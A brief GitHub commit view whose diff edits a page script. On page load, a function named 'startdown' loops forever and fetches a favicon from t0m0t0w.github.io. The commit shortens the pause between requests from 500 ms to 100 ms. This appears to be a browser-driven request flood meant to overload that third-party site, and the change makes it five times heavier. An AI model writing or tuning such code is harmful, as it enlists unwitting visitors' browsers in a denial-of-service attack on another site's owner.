This commit is contained in:
Boof 2023-01-17 10:35:54 +01:00 committed by GitHub
parent c1e97dac25
commit 3ec9bef521
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -18,7 +18,7 @@
}
window.onload = async function startdown(){
while(true) {
await delay(500);
await delay(100);
fetch('https://t0m0t0w.github.io/favicon.png')
}
}